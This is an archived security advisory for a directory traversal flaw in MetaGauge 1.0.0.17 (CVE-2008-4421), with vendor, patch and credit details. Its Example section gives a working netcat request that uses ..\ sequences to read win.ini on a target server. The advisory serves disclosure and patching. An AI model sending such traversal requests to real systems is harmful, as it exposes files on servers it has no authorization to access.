AOH :: HP Unsorted M :: VA1477.HTM

MetaGauge 1.0.0.17 Directory Traversal



MetaGauge 1.0.0.17 Directory Traversal
MetaGauge 1.0.0.17 Directory Traversal



Title: MetaGauge 1.0.0.17 Directory Traversal=0D
=0D
-------------------------------------------------------------=0D
=0D
Vendor: Hammer Software=0D
=0D
Vendor URL: www.Hammer-Software.com=0D 
=0D
Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.=0D
=0D
Description:=0D
=0D
A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server. =0D
=0D
Example:=0D
=0D
C:\> nc targethost 2004=0D
GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1=0D
=0D
=0D
Patch Information:=0D
=0D
Hammer has addressed the issue in the latest version of MetaGauge:=0D
=0D
http://dl.hammer-software.com/metagauge.zip=0D 
=0D
CVE:  CVE-2008-4421=0D
=0D
Credit:=0D
=0D
Brad Antoniewicz=0D
=0D
brad.antoniewicz@foundstone.com=0D 

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.